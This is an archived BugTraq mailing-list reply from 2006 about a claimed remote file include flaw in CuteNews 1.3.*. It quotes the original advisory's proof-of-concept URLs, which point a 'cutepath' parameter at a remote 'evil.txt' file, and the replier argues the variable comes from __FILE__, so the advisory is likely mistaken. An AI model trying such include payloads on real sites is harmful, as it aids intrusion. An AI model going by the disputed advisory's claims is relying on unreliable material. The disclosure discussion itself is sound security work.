|
|
BugTraq
CuteNews 1.3.* Remote File Include Vulnerability Aug 25 2006 07:14PM stormhacker hotmail com (2 replies) Re: CuteNews 1.3.* Remote File Include Vulnerability Aug 29 2006 10:12PM Carsten Eilers (ceilers-lists gmx de) |
|
Privacy Statement |
>
> -----------------Description---------------
>
>
> $cutepath = __FILE__;
>
> $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
>
> $cutepath = preg_replace( "'/search\.php'", "", $cutepath);
>
>
> require_once("$cutepath/inc/functions.inc.php");
>
>
> --------------PoC/Exploit----------------------
>
>
> show_news.php?cutepath=http://host/evil.txt?
>
> search.php?cutepath=http://host/evil.txt?
>
$cutepath = __FILE__;
$cutepath is set to script's working directory, so you can not set it
manually.
> --------------Solution---------------------
>
>
> No Patch available.
>
>
As no needed? ;)
Greets,
satalin
[ reply ]